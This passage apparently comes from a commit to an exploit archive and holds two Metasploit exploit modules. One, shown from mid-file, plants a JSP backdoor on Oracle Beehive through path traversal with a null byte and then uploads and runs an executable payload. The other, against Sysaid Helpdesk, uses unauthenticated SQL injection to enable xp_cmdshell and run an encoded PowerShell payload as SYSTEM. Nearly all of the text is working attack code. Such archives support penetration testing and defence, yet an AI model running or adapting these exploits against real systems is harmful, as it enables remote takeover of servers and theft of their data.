'DisclosureDate' => "Nov 10 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
], self.class)
end
def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/'))
if res.nil?
vprint_error("Connection timed out.")
return Exploit::CheckCode::Unknown
elsif res && (res.code == 403 || res.code == 200)
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet')
end
# Init some names
# We will upload to:
# C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\
exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
print_status("Stager name is: #{stager_name}")
print_status("Executable name is: #{exe_name}")
register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}")
# Ok fire!
print_status("Uploading stager...")
res = upload_stager(stager_name, exe_name)
# Hmm if we fail to upload the stager, no point to continue.
unless res
fail_with(Failure::Unknown, 'Connection timed out.')
end
print_status("Uploading payload...")
upload_payload(stager_name)
end
# Our stager is basically a backdoor that allows us to upload an executable with a POST request.
def get_jsp_stager(exe_name)
jsp = %Q|<%@ page import="java.io.*" %>
<%
ByteArrayOutputStream buf = new ByteArrayOutputStream();
BufferedReader reader = request.getReader();
int tmp;
while ((tmp = reader.read()) != -1) { buf.write(tmp); }
FileOutputStream fostream = new FileOutputStream("#{exe_name}");
buf.writeTo(fostream);
fostream.close();
Runtime.getRuntime().exec("#{exe_name}");
%>|
# Since we're sending it as a GET request, we want to keep it smaller so
# we gsub stuff we don't want.
jsp.gsub!("\n", '')
jsp.gsub!(' ', ' ')
Rex::Text.uri_encode(jsp)
end
def upload_stager(stager_name, exe_name)
# wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug)
jsp_stager = get_jsp_stager(exe_name)
uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp')
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'encode_params' => false, # Don't encode %00 for us
'vars_post' => {
'sess' => "..\\#{stager_name}%00",
'recxml' => jsp_stager,
'audiopath' => Rex::Text.rand_text_alpha(1),
'wavfile' => "#{Rex::Text.rand_text_alpha(5)}.wav",
'evaluation' => Rex::Text.rand_text_alpha(1)
}
})
end
def upload_payload(stager_name)
uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'data' => generate_payload_exe(code: payload.encoded)
})
end
def print_status(msg)
super("#{rhost}:#{rport} - #{msg}")
end
end

184
platforms/windows/webapps/38822.rb Executable file
View file

@ -0,0 +1,184 @@
# Exploit Title: Sysaid Helpdesk Software Unauthenticated SQLi
# Date: 28.11.2015
# Exploit Author: hland
# Vendor Homepage: https://www.sysaid.com/
# Version: v14.4.32 b25
# Tested on: Windows 7, Windows 10
# Blog post: http://blog.blankhat.pw/2015/09/unauthenticated-sql-injection-in-sysaid.html
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Sysaid Helpdesk Software Unauthenticated SQLi",
'Description' => %q{
This module exploits an unauthenticated SQLi vulnerability in the Sysaid
Helpdesk Free software. Because the "menu" parameter is not handled correctly,
a malicious user can manipulate the SQL query, and allows
arbitrary code execution under the context of 'SYSTEM' because the database
runs as the SA user. This module uses a Metasploit generated Powershell payload and
uses xp_cmdshell, which is activated and then deactivated after exploitation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Hland',
],
'References' =>
[
['CVE', 'xxxx'],
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
['Sysaid Helpdesk <= v14.4.32 b25', {}]
],
'Privileged' => false,
'DisclosureDate' => "Aug 29 2015",
'DefaultTarget' => 0,
))
register_options(
[
OptPort.new('RPORT', [true, "The web application's port", 8080]),
OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
uri = target_uri.path
uri = normalize_uri(uri,"Login.jsp")
print_status("#{peer} - Checking for vulnerability")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' => {
}
})
v = res.body.scan(/\<title\>SysAid Help Desk Software\<\/title\>/)
if not v
vprint_error("Is this even a Sysaid Help Desk?")
return Exploit::CheckCode::Safe
else
vprint_status("Identified system as Sysaid Help Desk")
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Unknown
end
def mssql_xpcmdshell(cmd,doprint=false,opts={})
force_enable = false
begin
res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint)
#mssql_print_reply(res) if doprint
return res
rescue RuntimeError => e
if(e.to_s =~ /xp_cmdshell disabled/)
force_enable = true
retry
end
raise e
end
end
def exploit
peer = "#{rhost}:#{rport}"
uri = target_uri.path
vprint_line("#{peer} - Getting a session token...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "Login.jsp"),
'vars_get' => {
}
})
vprint_line("#{peer} - Cookie's in the jar...")
# Got a cookie, now ready to make exploiting requests
if res && res.code == 200
#vprint_line("#{res.headers}")
cookies = res.get_cookies
#vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}")
else
vprint_line("No 200 response? I'm outta here")
return
end
# Put together the vulnerable URI
uri = normalize_uri(uri,"api","v1","menu","menu_items")
# Generate powershell payload as an encoded string
powershell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:encode_final_payload => true, :remove_comspec => true})
#
# Inject payload and wait for shell
#
print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability")
sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--"
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'cookie' => cookies,
'vars_get' => {
'menu' => sqli,
}
})
# Deactivate XPCmdShell
sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--"
print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'cookie' => cookies,
'vars_get' => {
'menu' => sqli,
}
})
end
end